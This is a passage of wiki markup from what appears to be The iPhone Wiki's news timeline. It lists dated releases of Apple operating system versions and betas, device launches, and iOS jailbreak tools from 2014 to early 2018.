* 29 March -- audioOS 11.3, iOS 11.3, tvOS 11.3 and watchOS 4.3 released.&lt;br /&gt;
* 28 March -- iOS 11.3 for [[iPad (6th generation)]] released.&lt;br /&gt;
* 27 March -- [[iPad (6th generation)]] released.&lt;br /&gt;
* 20 March -- tvOS 11.3 beta 6 released.&lt;br /&gt;
* 16 March -- iOS 11.3 beta 6 and watchOS 4.3 beta 6 released.&lt;br /&gt;
* 12 March -- iOS 11.3 beta 5, tvOS 11.3 beta 5 and watchOS 4.3 beta 5 released.&lt;br /&gt;
* 6 March -- watchOS 4.3 beta 4 released.&lt;br /&gt;
* 5 March -- iOS 11.3 beta 4 and tvOS 11.3 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 26 February -- [[Electra]] 1.0 and 1.0.1 released to the public. &lt;br /&gt;
* 21 February -- watchOS 4.3 beta 3 released.&lt;br /&gt;
* 20 February -- iOS 11.3 beta 3 and tvOS 11.3 beta 3 released.&lt;br /&gt;
* 19 February -- iOS 11.2.6, tvOS 11.2.6 and watchOS 4.2.3 released.&lt;br /&gt;
* 7 February -- watchOS 4.3 beta 2 released.&lt;br /&gt;
* 6 February -- iOS 11.3 beta 2, and tvOS 11.3 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 25 January -- watchOS 4.3 beta released.&lt;br /&gt;
* 24 January -- iOS 11.3 beta and tvOS 11.3 beta released.&lt;br /&gt;
* 23 January -- iOS 11.2.5, tvOS 11.2.5, watchOS 4.2.2 and audioOS 11.2.5 beta 3 released.&lt;br /&gt;
* 19 January -- iOS 11.2.5 beta 7 and watchOS 4.2.2 beta 5 released.&lt;br /&gt;
* 17 January -- iOS 11.2.5 beta 6 and tvOS 11.2.5 beta 6 released.&lt;br /&gt;
* 12 January -- tvOS 11.2.5 beta 5 and [[Electra]] JB toolkit released.&lt;br /&gt;
* 11 January -- iOS 11.2.5 beta 5 released.&lt;br /&gt;
* 9 January -- iOS 11.2.5 beta 4, watchOS 4.2.2 beta 4 and tvOS 11.2.5 beta 4 released.&lt;br /&gt;
* 8 January -- iOS 11.2.2 released.&lt;br /&gt;
* 3 January -- iOS 11.2.5 beta 3, watchOS 4.2.2 beta 3 and tvOS 11.2.5 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 24 December -- [[h3lix]] beta 1 released to jailbreak 32-bit devices running iOS 10.x.&lt;br /&gt;
* 19 December -- iOS 11.2.5 beta 2, watchOS 4.2.2 beta 2, audioOS 11.2.5 beta 2 and tvOS 11.2.5 beta 2 released. &lt;br /&gt;
* 13 December -- iOS 11.2.1 and tvOS 11.2.1 released. iOS 11.2.5 beta, watchOS 4.2.2 beta, tvOS 11.2.5 beta, and audioOS 11.2.5 beta also released.&lt;br /&gt;
* 5 December -- watchOS 4.2 released. &lt;br /&gt;
* 4 December -- tvOS 11.2 released. &lt;br /&gt;
* 2 December -- iOS 11.2 released. &lt;br /&gt;
* 1 December -- iOS 11.2 beta 6 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 28 November -- iOS 11.2 beta 5 and tvOS 11.2 beta 5 released.&lt;br /&gt;
* 17 November -- iOS 11.2 beta 4, tvOS 11.2 beta 4 and watchOS 11.2 beta 4 released.&lt;br /&gt;
* 16 November -- iOS 11.1.2 released.&lt;br /&gt;
* 13 November -- iOS 11.2 beta 3, tvOS 11.3 beta 3 and watchOS 4.2 beta 3 released.&lt;br /&gt;
* 9 November -- iOS 11.1.1 released.&lt;br /&gt;
* 6 November -- iOS 11.2 beta 2, tvOS 11.2 beta 2, watchOS 4.2 beta 2 and [[audioOS]] 11.2 beta 2 released.&lt;br /&gt;
* 3 November -- iPhone X released. iOS 11.2 beta 2 for [[iPhone X]] released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 31 October -- iOS 11.1, tvOS 11.1 and watchOS 4.1 released.&lt;br /&gt;
* 30 October -- iOS 11.2 beta, tvOS 11.2 beta, watchOS 4.2 beta and [[audioOS]] 11.2 beta released.&lt;br /&gt;
* 23 October -- iOS 11.1 beta 5 and tvOS 11.1 beta 4 released.&lt;br /&gt;
* 20 October -- iOS 11.1 beta 4 and watchOS 4.1 beta 4 released.&lt;br /&gt;
* 16 October -- iOS 11.1 beta 3, tvOS 11.1 beta 3 and watchOS 4.1 beta 3 released.&lt;br /&gt;
* 15 October -- [[Saïgon]] jailbreak released in beta.&lt;br /&gt;
* 11 October -- iOS 11.0.3 released.&lt;br /&gt;
* 9 October -- iOS 11.1 beta 2, tvOS 11.1 beta 2 and watchOS 4.1 beta 2 released. &lt;br /&gt;
* 4 October -- watchOS 4.0.1 released.&lt;br /&gt;
* 3 October -- iOS 11.0.2 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 27 September -- iOS 11.1 beta, tvOS 11.1 beta and watchOS 4.1 beta released. &lt;br /&gt;
* 26 September -- iOS 11.0.1 released.&lt;br /&gt;
* 22 September -- [[Apple Watch Series 3]], [[Apple TV 4K]], [[iPhone 8]], and [[iPhone 8 Plus]] released.&lt;br /&gt;
* 19 September -- iOS 11.0, tvOS 11.0 and watchOS 4.0 released. [[EtasonJB]] released for iOS 8.4.1.&lt;br /&gt;
* 12 September -- iOS 11.0 [[Golden Master|GM]], tvOS 11.0 [[Golden Master|GM]] and watchOS 4.0 [[Golden Master|GM]] released. [[Apple Watch Series 3]], [[Apple TV 4K]], [[iPhone 8]], [[iPhone 8 Plus]] and [[iPhone X]] announced.&lt;br /&gt;
* 6 September -- iOS 11.0 beta 10 released.&lt;br /&gt;
* 5 September -- tvOS 11.0 beta 10 released.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 31 August -- iOS 11.0 beta 9 and tvOS 11.0 beta 9 released.&lt;br /&gt;
* 28 August -- iOS 11.0 beta 8, tvOS 11.0 beta 8 and watchOS 4.0 beta 8 released.&lt;br /&gt;
* 21 August -- iOS 11.0 beta 7, tvOS 11.0 beta 7 and watchOS 4.0 beta 7 released.&lt;br /&gt;
* 14 August -- iOS 11.0 beta 6, tvOS 11.0 beta 6 and watchOS 4.0 beta 6 released.&lt;br /&gt;
* 7 August -- iOS 11.0 beta 5, tvOS 11.0 beta 5 and watchOS 4.0 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 24 July -- iOS 11.0 beta 4, tvOS 11.0 beta 4 and watchOS 4.0 beta 4 released. &lt;br /&gt;
* 19 July -- iOS 10.3.3, tvOS 10.2.2 and watchOS 3.2.3 released. &lt;br /&gt;
* 13 July -- watchOS 4.0 beta 3 released. &lt;br /&gt;
* 10 July -- iOS 11.0 beta 3 and tvOS 11.0 beta 3 released. &lt;br /&gt;
* 6 July -- tvOS 10.2.2 beta 5 released. &lt;br /&gt;
* 5 July -- iOS 10.3.3 beta 6 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 28 June -- iOS 10.3.3 beta 5 released.&lt;br /&gt;
* 26 June -- iOS 11.0 beta 2 (build 15A5304j), tvOS 11.0 beta 2 (build 15J5310h) and watchOS 3.2.3 beta 4 released. &lt;br /&gt;
* 22 June -- iOS 10.3.3 beta 4 and tvOS 10.2.2 beta 4 released.&lt;br /&gt;
* 21 June -- iOS 11.0 beta 2, tvOS 11.0 beta 2 and watchOS 4.0 beta 2 released. &lt;br /&gt;
* 13 June -- iOS 10.3.3 beta 3, tvOS 10.2.2 beta 3 and watchOS 3.2.3 beta 3 released.&lt;br /&gt;
* 7 June -- tvOS 11.0 beta (build 15J5284g) released.&lt;br /&gt;
* 5 June -- iOS 11.0 beta, tvOS 11.0 beta (build 15J5284e), watchOS 4.0 beta and iOS 10.3.2 for [[iPad Pro (12.9-inch) (2nd generation)]] and [[iPad Pro (10.5-inch)]] released.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 30 May -- iOS 10.3.3 beta 2, tvOS 10.2.2 beta 2 and watchOS 3.2.3 beta 2 released. &lt;br /&gt;
* 16 May -- iOS 10.3.3 beta, tvOS 10.2.2 beta and watchOS 3.2.3 beta released. &lt;br /&gt;
* 15 May -- iOS 10.3.2, tvOS 10.2.1 and watchOS 3.2.2 released. &lt;br /&gt;
* 4 May -- tvOS 10.2.1 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 27 April -- iOS 10.3.2 beta 5 released. &lt;br /&gt;
* 24 April -- iOS 10.3.2 beta 4, watchOS 3.2.2 beta 4 and tvOS 10.2.1 beta 4 released. &lt;br /&gt;
* 17 April -- iOS 10.3.2 beta 3, watchOS 3.2.2 beta 3 and tvOS 10.2.1 beta 2 released. &lt;br /&gt;
* 11 April -- [[alloc8 Exploit]] released for all revisions of the [[iPhone 3GS]], along with [[ipwndfu]] as a tool to utilise this exploit.&lt;br /&gt;
* 10 April -- iOS 10.3.2 beta 2, watchOS 3.2.2 beta 2 and tvOS 10.2.1 beta 2 released.&lt;br /&gt;
* 3 April -- iOS 10.3.1 released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 28 March -- iOS 10.3.2 beta, watchOS 3.2.2 beta and tvOS 10.2.1 beta released.&lt;br /&gt;
* 27 March -- iOS 10.3, watchOS 3.2 and tvOS 10.2 released. &lt;br /&gt;
* 24 March -- [[iPad (5th generation)]], 32GB/128GB [[iPhone SE (1st generation)]] and PRODUCT(RED) [[iPhone 7]] available for purchase.&lt;br /&gt;
* 21 March -- [[iPad (5th generation)]] and iPhone 7 (PRODUCT)RED Special Edition announced.&lt;br /&gt;
* 20 March -- watchOS 3.2 beta 7 released. &lt;br /&gt;
* 16 March -- iOS 10.3 beta 7 released.&lt;br /&gt;
* 14 March -- tvOS 10.2 beta 6 and watchOS 3.2 beta 6 released.&lt;br /&gt;
* 13 March -- iOS 10.3 beta 6 released.&lt;br /&gt;
* 8 March -- iOS 10.3 beta 5, tvOS 10.2 beta 5 and watchOS 3.2 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 28 February -- tvOS 10.2 beta 4 released.&lt;br /&gt;
* 27 February -- iOS 10.3 beta 4 and watchOS 3.2 beta 4 released.&lt;br /&gt;
* 20 February -- iOS 10.3 beta 3, tvOS 10.2 beta 3 and watchOS 3.2 beta 3 released.&lt;br /&gt;
* 6 February -- iOS 10.3 beta 2, tvOS 10.2 beta 2 and watchOS 3.2 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 30 January -- watchOS 3.2 beta released.&lt;br /&gt;
* 24 January -- iOS 10.3 beta and tvOS 10.2 beta released.&lt;br /&gt;
* 23 January -- iOS 10.2.1, watchOS 3.1.3 and tvOS 10.1.1 released.&lt;br /&gt;
* 12 January -- iOS 10.2.1 beta 4 released.&lt;br /&gt;
* 9 January -- iOS 10.2.1 beta 3, watchOS 3.1.3 beta 2 and tvOS 10.1.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 21 December -- watchOS 3.1.3 beta released.&lt;br /&gt;
* 20 December -- iOS 10.2.1 beta 2 released.&lt;br /&gt;
* 14 December -- iOS 10.2.1 beta and tvOS 10.1.1 beta released.&lt;br /&gt;
* 13 December -- watchOS 3.1.1 retracted after reports of [[Apple Watch Series 2]] units bring bricked.&lt;br /&gt;
* 12 December -- iOS 10.2, tvOS 10.1, watchOS 3.1.1 and Apple TV iOS 7.2.2 released.&lt;br /&gt;
* 7 December -- iOS 10.2 beta 7 released. [[User:qwertyoruiop|qwertyoruiop]] releases [https://jbme.qwertyoruiop.com/ jbme] to re-enable the [[Pangu9]] jailbreak for iOS 9.3.3, as an alternative to the IPA.&lt;br /&gt;
* 6 December -- tvOS 10.1 beta 5 released.&lt;br /&gt;
* 5 December -- iOS 10.2 beta 6 and watchOS 3.1.1 beta 5 released.&lt;br /&gt;
* 2 December -- iOS 10.2 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 30 November -- tvOS 10.1 beta 4 released.&lt;br /&gt;
* 28 November -- iOS 10.2 beta 4 and watchOS 3.1.1 beta 4 released.&lt;br /&gt;
* 15 November -- watchOS 3.1.1 beta 3 released.&lt;br /&gt;
* 14 November -- iOS 10.2 beta 3, tvOS 10.1 beta 3 and 10.0.1 released.&lt;br /&gt;
* 9 November -- iOS 10.1.1 (14B150) released via IPSW's only.&lt;br /&gt;
* 7 November -- iOS 10.2 beta 2, tvOS 10.1 beta 2 and watchOS 3.1.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 31 October -- iOS 10.1.1, 10.2 beta, tvOS 10.1 beta and watchOS 3.1.1 beta released.&lt;br /&gt;
* 24 October -- iOS 10.1, tvOS 10.0.1 and watchOS 3.1 released.&lt;br /&gt;
* 20 October -- tvOS 10.0.1 beta 4 released.&lt;br /&gt;
* 19 October -- iOS 10.1 beta 5 for [[iPhone 7]] and [[iPhone 7 Plus]] released.&lt;br /&gt;
* 17 October -- iOS 10.0.3 for [[iPhone 7]] and [[iPhone 7 Plus]] and iOS 10.1 beta 4 released.&lt;br /&gt;
* 12 October -- watchOS 3.1 beta 3 released.&lt;br /&gt;
* 10 October -- iOS 10.1 beta 3 and tvOS 10.0.1 beta 3 released.&lt;br /&gt;
* 4 October -- iOS 10.1 beta 2, tvOS 10.0.1 beta 2 and watchOS 3.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 23 September -- iOS 10.0.2 released.&lt;br /&gt;
* 21 September -- iOS 10.1 beta, tvOS 10.0.1 beta and watchOS 3.1 beta released.&lt;br /&gt;
* 13 September -- iOS 10.0.1, tvOS 10.0 and watchOS 3.0 released.&lt;br /&gt;
* 7 September -- iOS 10.0.1 [[Golden Master|GM]], tvOS 10.0 [[Golden Master|GM]] and watchOS 3.0 [[Golden Master|GM]] released. [[Apple Watch Series 1]], [[Apple Watch Series 2]], [[iPhone 7]], [[iPhone 7 Plus]] and [[B188AP|AirPods (1st generation)]] announced.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 26 August -- iOS 10.0 beta 8 and tvOS 10.0 beta 7 released.&lt;br /&gt;
* 25 August -- iOS 9.3.5 released.&lt;br /&gt;
* 19 August -- iOS 10.0 beta 7 released.&lt;br /&gt;
* 15 August -- iOS 10.0 beta 6, tvOS 10.0 beta 6 and watchOS 3.0 beta 6 released.&lt;br /&gt;
* 9 August -- iOS 10.0 beta 5, tvOS 10.0 beta 5 and watchOS 3.0 beta 5 released.&lt;br /&gt;
* 4 August -- iOS 9.3.4 released.&lt;br /&gt;
* 1 August -- iOS 10.0 beta 4, tvOS 10.0 beta 4 and watchOS 3.0 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 29 July -- [[Pangu9]] for iOS 9.2-9.3.3 English version released.&lt;br /&gt;
* 24 July -- [[Pangu9]] for iOS 9.2-9.3.3 released.&lt;br /&gt;
* 18 July -- iOS 10.0 beta 3, tvOS 10.0 beta 3 and watchOS 3.0 beta 3, iOS 9.3.3, watchOS 2.2.2 and tvOS 9.2.2 released.&lt;br /&gt;
* 6 July -- iOS 9.3.3 beta 5 and tvOS 9.2.2 beta 5 released.&lt;br /&gt;
* 5 July -- iOS 10.0 beta 2, tvOS 10.0 beta 2 and watchOS 3.0 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 29 June -- iOS 9.3.3 beta 4 and tvOS 9.2.2 beta 4 released.&lt;br /&gt;
* 21 June -- iOS 9.3.3 beta 3 and tvOS 9.2.2 beta 3 released.&lt;br /&gt;
* 13 June -- iOS 10.0 beta, tvOS 10.0 beta and watchOS 3.0 beta released.&lt;br /&gt;
* 6 June -- iOS 9.3.3 beta 2, tvOS 9.2.2 beta 2 and watchOS 2.2.2 beta released.&lt;br /&gt;
* 2 June -- iOS 9.3.2 (13F72) is released for the [[iPad Pro (9.7-inch)]].&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 23 May -- iOS 9.3.3 beta and tvOS 9.2.2 beta released.&lt;br /&gt;
* 19 May -- iOS 9.3.2 is retracted for the [[iPad Pro (9.7-inch)]] due to a bug that may prevent usage, but continues to be [[SHSH|signed]].&lt;br /&gt;
* 16 May -- iOS 9.3.2, tvOS 9.2.1 and watchOS 2.2.1 released.&lt;br /&gt;
* 3 May -- iOS 9.3.2 beta 4 and tvOS 9.2.1 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 27 April -- tvOS 9.2.1 beta 3 released.&lt;br /&gt;
* 26 April -- iOS 9.3.2 beta 3 released.&lt;br /&gt;
* 21 April -- tvOS 9.2.1 beta 2 re-released.&lt;br /&gt;
* 20 April -- iOS 9.3.2 beta 2 and watchOS 2.2.1 beta 2 released. tvOS 9.2.1 beta 2 was also made available, but it was quickly retracted due to a mishap with publishing.&lt;br /&gt;
* 6 April -- iOS 9.3.2 beta, watchOS 2.2.1 beta and tvOS 9.2.1 beta released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 31 March -- iOS 9.3.1 released.&lt;br /&gt;
* 28 March -- iOS 9.3 (13E237) released for iPad 2 ([[K93AP|iPad2,1]], [[K95AP|iPad2,3]], and [[K93AAP|iPad2,4]]), [[iPad (3rd generation)]], [[iPad (4th generation)]], [[iPad Air]], [[iPad mini]], [[iPad mini 2]], [[N94AP|iPhone 4s]], [[iPhone 5]], [[iPhone 5c]], [[iPhone 5s]], [[iPod touch (5th generation)]].&lt;br /&gt;
* 25 March -- iOS 9.3 (13E236) released for [[K94AP|iPad 2 (iPad2,2)]].&lt;br /&gt;
* 23 March -- Pangu released [[J42dAP|Apple TV HD]] [[tvOS]] 9.0 - 9.0.1 jailbreak (v1.0.0).&lt;br /&gt;
* 21 March -- iOS 9.3, tvOS 9.2 and watchOS 2.2 released to the public. [[iPad Pro (9.7-inch)]] and [[iPhone SE (1st generation)]] announced&lt;br /&gt;
* 16 March -- Pangu9 1.3.1 (Windows)/1.1.1 (Mac) released to make untether of iOS 9.1 more stable.&lt;br /&gt;
* 14 March -- iOS 9.3 beta 7 released.&lt;br /&gt;
* 11 March -- Pangu9 1.3.0 (Windows)/1.1.0 (Mac) released to jailbreak 64-bit devices on iOS 9.1.&lt;br /&gt;
* 10 March -- tvOS 9.2 beta 6 released.&lt;br /&gt;
* 7 March -- iOS 9.3 beta 6 and watchOS 2.2 beta 6 released.&lt;br /&gt;
* 1 March -- iOS 9.3 beta 5, tvOS 9.2 beta 5 and watchOS 2.2 beta 5 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 25 February -- [[Apple TV (3rd generation)]] software 7.2.1 released.&lt;br /&gt;
* 22 February -- iOS 9.3 beta 4, tvOS 9.2 beta 4 and watchOS 2.2 beta 4 released.&lt;br /&gt;
* 18 February -- iOS 9.2.1 (13D20) for [[N61AP|iPhone 6]], [[N56AP|iPhone 6 Plus]], [[iPhone 6s]], [[iPhone 6s Plus]], [[iPad mini 3]], [[iPad mini 4]], [[iPad Air 2]], and [[iPad Pro (12.9-inch)]] released.&lt;br /&gt;
* 8 February -- tvOS 9.2 beta 3, watchOS 2.2 beta 3 and iOS 9.3 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 25 January -- tvOS 9.1.1, 9.2 beta 2, watchOS 2.2 beta 2 and iOS 9.3 beta 2 released.&lt;br /&gt;
* 19 January -- iOS 9.2.1 released.&lt;br /&gt;
* 14 January -- iOS 9.3 beta 1.1 released.&lt;br /&gt;
* 11 January -- iOS 9.3, tvOS 9.1.1, tvOS 9.2 beta, and watchOS 2.2 beta released.&lt;br /&gt;
* 4 January -- iOS 9.2.1 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 25 December -- TaiG 2.4.5 released.&lt;br /&gt;
* 16 December -- iOS 9.2.1 beta seeded to developers.&lt;br /&gt;
* 8 December -- iOS 9.2, tvOS 9.1 and watchOS 2.1 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 30 November -- TaiG 2.4.4 released (no longer beta).&lt;br /&gt;
* 20 November -- TaiG 2.4.4 beta released.&lt;br /&gt;
* 18 November -- iOS 9.2 beta 4 and tvOS 9.1 beta 3 released.&lt;br /&gt;
* 17 November -- iOS 9.1 (13B144) for iPad Pro (12.9-inch) released.&lt;br /&gt;
* 11 November -- [[iPad Pro (12.9-inch)]] released.&lt;br /&gt;
* 10 November -- iOS 9.2 beta 3 and tvOS 9.1 beta 2 released&lt;br /&gt;
* 9 November -- tvOS 9.0.1 released.&lt;br /&gt;
* 3 November -- iOS 9.2 beta 2 and tvOS 9.1 beta released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 29 October -- iOS 9.2 public beta and tvOS 9.0 released.&lt;br /&gt;
* 28 October -- [[Pangu9]] 1.0.0 for Mac released.&lt;br /&gt;
* 27 October -- [[Pangu9]] 1.2.0 and iOS 9.2 beta released.&lt;br /&gt;
* 22 October -- [[Seas0nPass]] 0.9.7 beta released to jailbreak [[K66AP|Apple TV (2nd generation)]] running 6.2.1 tethered.&lt;br /&gt;
* 21 October -- [[Pangu9]] 1.1.0, iOS 9.1, tvOS 9.0GM, watchOS 2.0.1 and iTunes 12.3.1 released.&lt;br /&gt;
* 15 October -- [[Pangu9]] 1.0.1 released.&lt;br /&gt;
* 14 October -- [[Pangu9]] 1.0.0 released to jailbreak iOS 9.0, 9.0.1 and 9.0.2.&lt;br /&gt;
* 12 October -- iOS 9.1 beta 5 released.&lt;br /&gt;
* 6 October -- iOS 9.1 beta 4 and tvOS 9.0 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 30 September -- iOS 9.0.2 and 9.1 beta 3 released.&lt;br /&gt;
* 24 September -- iOS 9.0.1 released for iPhone 6s and iPhone 6s Plus.&lt;br /&gt;
* 23 September -- iOS 9.0.1 (excluding iPhone 6s and iPhone 6s Plus) , 9.1 beta 2 and tvOS 9.0 beta 2 released.&lt;br /&gt;
* 21 September -- watchOS 2.0 released to the public.&lt;br /&gt;
* 16 September -- iOS 9.0 released to the public.&lt;br /&gt;
* 9 September -- iOS 9.0 [[Golden Master|GM]], watchOS 2.0 [[Golden Master|GM]] and iOS 9.1 beta released to developers. [[iPhone 6s]], [[iPhone 6s Plus]], [[iPad Pro (12.9-inch)]], [[iPad mini 4]] and [[J42dAP|Apple TV HD]] announced.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 13 August -- iOS 8.4.1 and iTunes 12.2.2 released.&lt;br /&gt;
* 6 August -- iOS 9.0 beta 5 and watchOS 2.0 beta 5 released.&lt;br /&gt;
* 4 August -- TaiG 1.1.0 for Mac released.&lt;br /&gt;
* 2 August -- TaiG 1.0.0 for Mac released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 30 July -- iOS 8.4.1 beta 2 released.&lt;br /&gt;
* 21 July -- iOS 9.0 beta 4 and watchOS 2.0 beta 4 released.&lt;br /&gt;
* 20 July -- [[TaiG]] 2.4.3 released, no longer a beta.&lt;br /&gt;
* 16 July -- [[TaiG]] 2.4.3 beta released, optimises jailbreak process.&lt;br /&gt;
* 15 July -- [[N102AP|iPod touch (6th generation)]] released.&lt;br /&gt;
* 14 July -- iOS 8.4.1 beta released.&lt;br /&gt;
* 13 July -- [[TaiG]] 2.4.2 Beta released, fixes 30% and 40% issues as well as bundling Cydia 1.1.23. [[PPJailbreak]] 2.0.0 released to jailbreak iOS 8.1.3 - 8.4 on Mac.&lt;br /&gt;
* 11 July -- [[TaiG]] 2.4.1 released.&lt;br /&gt;
* 10 July -- [[TaiG]] 2.4.1 Beta released, fixes 60% issue.&lt;br /&gt;
* 7 July -- [[TaiG]] 2.3.1 released.&lt;br /&gt;
* 6 July -- [[TaiG]] 2.3.1 Beta released, includes Cydia 1.1.20.&lt;br /&gt;
* 3 July -- [[TaiG]] 2.3.0 released, which removes the setruid-patch&lt;br /&gt;
* 2 July -- [[TaiG]] 2.2.1 released to address a security vulnerability allowing all apps to get root easily.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 30 June -- iOS 8.4 released. [[TaiG]] 2.2.0 released to jailbreak iOS 8.4.&lt;br /&gt;
* 23 June -- [[TaiG]] 2.0.0 released to jailbreak iOS 8.1.3, 8.2 and 8.3.&lt;br /&gt;
* 8 June -- Apple announces iOS 9, watchOS 2.0, and a release date of June 30 for iOS 8.4 at [[WWDC]] 2015.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 15 May -- [[User:geohot|geohot]] [[The iPhone Wiki:Changing Ownership|transfers]] ownership of The iPhone Wiki to [[User:saurik|saurik]].&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 23 April -- iOS 8.2 (build 12S506) released for Apple Watch.&lt;br /&gt;
* 8 April -- iOS 8.3 and Apple TV 7.2 released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 9 March -- iOS 8.2 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 23 February -- [[TaiG]] updated to version 1.3 to support iOS 8.2 beta and beta 2.&lt;br /&gt;
* 12 February -- [[TaiG]] updated to version 1.2.1 to support iTunes 12.1.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 27 January -- iOS 8.1.3 and 7.0.3 (8.1.3) for Apple TV released.&lt;br /&gt;
* 18 January -- [[PPJailbreak]] released to jailbreak iOS 8.0 - 8.1.2 on a Mac.&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 9 December -- iOS 8.1.2 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 29 November -- [[TaiG]] released to jailbreak iOS 8.0 - 8.1.1 on all devices except Apple TV.&lt;br /&gt;
* 18 November -- iOS 8.1.1 and Apple TV 7.0.2 released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 22 October -- [[Pangu8]] for iOS 8.x released.&lt;br /&gt;
* 20 October -- iOS 8.1 released.&lt;br /&gt;
* 16 October -- [[iPad Air 2]] and [[iPad mini 3]] announced.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 25 September -- iOS 8.0.2 released.&lt;br /&gt;
* 24 September -- iOS 8.0.1 released. Critical bugs affecting Touch ID and cellular service was quickly discovered[http://support.apple.com/kb/HT6487] and the update was retracted.&lt;br /&gt;
* 19 September -- Initial release of [[N61AP|iPhone 6]] and [[N56AP|iPhone 6 Plus]].&lt;br /&gt;
* 17 September -- iOS 8.0 is released to the public, as well as 6.2.1 for the [[K66AP|Apple TV (2nd generation)]].&lt;br /&gt;
* 9 September -- Apple announces the [[Apple Watch (1st generation)]], [[N61AP|iPhone 6]], and [[N56AP|iPhone 6 Plus]].&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 30 June -- iOS 7.1.2 and Apple TV 6.2 released to fix iBeacon connectivity, mail attachments not being encrypted and a bug with data transfers from third party accessories.&lt;br /&gt;
* 29 June -- [[Pangu]] 1.1.0 released with lots of improvements.&lt;br /&gt;
* 23 June -- [[Pangu]] released to jailbreak iOS 7.1.x untethered.&lt;br /&gt;
* 1 June -- [[p0sixspwn]] updated to version 1.0.8 to support iOS 6.1.6 and fix iTunes 11.1+ crashes.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 22 April -- [[iOS]] 7.1.1 and Apple TV 6.1.1 released with bug fixes, including [[Touch ID]] fixes.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 27 March -- [[evasi0n7]] updated to 1.0.8 to support iOS 7.0 (11A466) that shipped with some 5s and 5c iPhones&lt;br /&gt;
* 10 March -- [[iOS]] 7.1, Apple TV iOS 6.1, [[J73AP|iPad Air (iPad4,3)]] and [[J87AP|iPad mini 2 (iPad4,6)]] released.&lt;br /&gt;
* 1 March -- [[evasi0n7]] updated to 1.0.7 to fix problem where bundled repository package information could not be refreshed/updated by Cydia and updated bundled Cydia package lists.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 26 February -- [[iTunes]] updated to 11.1.5 to fix crashing and improve iBooks compatibility on OS X.&lt;br /&gt;
* 22 February -- [[evasi0n7]] updated to version 1.0.6 to support iOS 7.0.6.&lt;br /&gt;
* 21 February -- [[iOS]] 7.0.6 and iOS 6.1.6 released to address faulty SSL validation.&lt;br /&gt;
* 5 February -- [[evasi0n7]] updated to version 1.0.5 to support iOS 7.0.5.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 29 January -- [[iOS]] 7.0.5 released for [[N49AP|iPhone 5c (iPhone5,4)]] and [[N53AP|iPhone 5s (iPhone6,2)]], fixing network provisioning.&lt;br /&gt;
* 22 January -- [[iTunes]] 11.1.4 released, adding Wish List and language improvements. &lt;br /&gt;
* 12 January -- [[evad3rs]] releases [[evasi0n7]] 1.0.4 to fix important untether security bugs.&lt;br /&gt;
